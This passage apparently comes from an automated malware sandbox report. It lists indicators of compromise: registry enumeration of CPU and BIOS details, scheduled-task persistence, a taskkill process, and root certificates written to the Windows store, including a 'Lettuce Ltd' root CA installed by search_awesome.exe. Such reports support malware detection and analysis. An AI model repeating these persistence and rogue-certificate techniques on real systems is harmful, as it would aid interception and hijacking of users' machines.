\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3552 schtasks.exe 6556 schtasks.exe -
Enumerates system info in registry 2 TTPs 45 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 1 IoCs
pid Process 6204 taskkill.exe -
Modifies data under HKEY_USERS 61 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "73" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\8\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0ADEF1D7458FF50D2CB80F9B486455321D405097\Blob = 0300000001000000140000000adef1d7458ff50d2cb80f9b486455321d4050972000000001000000e8050000308205e4308203cca003020102020900befe70a4dda2b7cb300d06092a864886f70d01010b0500307f310b30090603550406130247423110300e06035504080c07456e676c616e6431143012060355040a0c0b4c657474756365204c7464312a3028060355040b0c214c657474756365204c746420436572746966696361746520417574686f72697479311c301a06035504030c134c657474756365204c746420526f6f74204341301e170d3138303831333132303033375a170d3338303830383132303033375a307f310b30090603550406130247423110300e06035504080c07456e676c616e6431143012060355040a0c0b4c657474756365204c7464312a3028060355040b0c214c657474756365204c746420436572746966696361746520417574686f72697479311c301a06035504030c134c657474756365204c746420526f6f7420434130820222300d06092a864886f70d01010105000382020f003082020a0282020100ec84dbe1167402d093ee3957327a06f9ec78467185f3758cc42ff40a107901077b927de82e728413da614f1c7f167b842fd796ae20c966e18c3dd3725847531abfe6409a014278e8896fd18294f5e03dec7ae50b78e7ec4dc846f5157cfada8ef851306caf45a27d87c24ad54daa5ca764410a264558c05eb60e434e3174d28da2e8e56623f0920570047c3b57cf4ff981de8ba8062c3ab7334212ad00ac02768d933d0529b1d0607095bfbac20035cc0ae05b09dd87859a8387c18124e518d7161120016425658cd22ba129f5a9f4e09428be41bbc647c9456fe0a2b69ebcf0454b0c0f6fd3a46de9bdfbc74600fcf99a66a58d8a5c20a38272787f91a85d00d150880084cb2dada7701cc49aa4d64e007f6e9f3195a853fdf4a1d179f7d27e51a2dcaac65c4d017c645cd398da383f2a71656f192a314a3937551e33a10254727091235b967f0f596507f9ecc2d43247ac3a012e4125cb12a50a4c7bdc522d18cd0220125c8b30855f977f525a4a7ca16d9baad08e0c45b3fb57a290b2c2fafebe4953b1c8cc054cf196b5f64401b6eb5b1373a965e44cf1d438d307c05993bd41360c04e9537ab5b3780907a35dca4c2366935b49df8e25e8c1796e3150c584789b5c6143c4a51360930509ea83c4f881de1ec129d848d8eba5a081a29fca85b5a4aebeaa4909fa516ca50b2e1598231dbddfed4cab68348c4da0f23f29610203010001a3633061301d0603551d0e04160414379af2941ff3e0417c6af2e31e855e6bf9f82273301f0603551d23041830168014379af2941ff3e0417c6af2e31e855e6bf9f82273300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186300d06092a864886f70d01010b0500038202010007b451d6a5447265e025dbc28a15be06be84d8e583fcce5c4fb244004c1eb101c3e93877ece6ee7979ff9315158787f56252e0f54af375c9a4632a5bcd13eddffe7a1268a60e3b92c6cc39d67e6feb897740e11621ba1402ebccae7b2523ffe666ce2c9f9a2144078ceb615baa6053d0b829bd593bb67b250771c7977a8d2762a14449f446b8477f45f2737ee61d8d409d91efa918a066808c19f61f4e697656eb65ff36729dc647d8bd16b7b37cafa52d2093ea1eef1461ffba97f854253611d96ca818c1b1114e2fb9484f14c302eb70956fb31e55b67b7680862f681dd68b41d5edbced86a424a9c11c5633e102a709e8f5d78d23cd0678e49f64c768f615ff3460271b16b4b9b5c1251e1618145699bd6a44a483bf9e0fbbeda73122e60cc8a40a1cc798f6b893613c25f5dffd1aa5d445ed3c9f6fa9d7696c4ac808d045b46b986bd9afc56227230a099f90d7d1c1de04326aa205c297d5db27b58fd6e7f5a3611c46297786cc295a25f1bce53ed1e2ee78247b14f4621a12c119f89be4dc2411c0c118e90d18d0f433d862e2a8d6b3d8735c2e1001f056eb0e19790bcabbe301a9fa129e4718ad041479116770c4a760087f21cd9ddfd0f01b3b012fce9c0150a926fcf7d11954adab6e40186cf951411da04407ca39c7d120246319fd4053d9f53c01b1363101127beb63fb811fe1691da6851dd5aec644b7dd88b2b5 search_awesome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c